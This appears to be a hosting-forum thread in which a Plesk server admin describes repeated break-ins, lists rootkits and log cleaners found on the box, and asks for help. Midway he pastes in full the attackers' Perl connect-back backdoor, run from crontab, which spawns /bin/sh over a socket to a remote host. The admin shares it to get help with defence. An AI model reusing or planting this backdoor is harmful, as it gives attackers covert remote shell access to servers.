Server hacked - unable to log case at Support panel [SOLVED]

[breun]

Can you find a kernel version in Plesk (e.g. something like "Operating system: Linux 2.6.9-78.0.5.EL")? Or can you run "uname -a" via SSH?

I don't know if Plesk 8.3 has any known security vulnerabilities, but Plesk 8.6 is the current version.

[biggles]

uname -a: 2.6.9-023stab046.2-enterprise

[biggles]

OT: Is it safe to upgrade to 8.6 now? I am a little bit worried since the debacle with 8.4...

[breun]

uname -a: 2.6.9-023stab046.2-enterprise

The current 'super stable' RHEL4-based OpenVZ-kernel is 2.6.9-023stab048.4. I have no idea how old 2.6.9-023stab046.2 is. I believe uname -a also gives you a build date?

OT: Is it safe to upgrade to 8.6 now? I am a little bit worried since the debacle with 8.4...

What debacle? We updated all our machines to 8.4 and then 8.6. No problems whatsoever.

[biggles]

uname -s: 2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 i686 i686 i386 GNU/Linux

Debacle: A lot of people had trouble with e-mail and finally SWsoft released an update. http://kb.parallels.com/en/5256

[breun]

uname -s: 2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 i686 i686 i386 GNU/Linux

Well, that is an older kernel. I don't know if it contains any known local root exploits though. I track security vulnerabilities in the packages we use closely, but we're not running Virtuozzo, so I don't know about those Virtuozzo/OpenVZ kernels.

Debacle: A lot of people had trouble with e-mail and finally SWsoft released an update. http://kb.parallels.com/en/5256

Oh that. I never thought allowing the use of short mail account names was a smart idea, so this issue didn't affect us.

[BerArt]

I hope you can solve this, this is the worst nightmare for a hoster good luck!

[scott]

Whenever I have a bad feeling about an upgrade, I always test it on something first. Set up a vmware/kvm/xen/etc with the same PSA version, and do a backup/restore on that.

I cant stress how important it is to test when you're unsure. Worst case you waste a few hours, and learn some shortcuts.

[biggles]

A small update. The attackers got in again last night (European time). This time I cought them in the act and had the possibility to secure logs etc. They had also installed some programs among others "zap", "zmuie", some flood-kit, Part of IlloGiC RooTKiT v1.0 etc etc. They seemed to be running some tainted crond version. The support have been granted access to my server. Hopefully they will find out how they got in.

[BerArt]

I hope so too, good luck! please keep us posted...

[biggles]

Not much news. Scott had trouble logging in today. Hopefully he can do another attempt later. They broke into the server again today. They are executing this script via crontab:

#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";

Anyone has any input on how to stop this I am all ears...

[hostingguy]

Did you ever get anywhere on this ?

[scott]

Yeah a ways, the hosting company is very unhelpful. Can anyone recommend some decent European providers?

[BerArt]

We can deliver quality hosting form the Netherlands! You can mail me at info @ ber-art.nl our servers are being maintained by Lemonbit (alias breun)

[faris]

Yes, you can't go wrong with breun/Lemonbit.

I've "known" them for a very long time from these forums and you will never get bad advice from them. Same goes for BerArt!

Faris.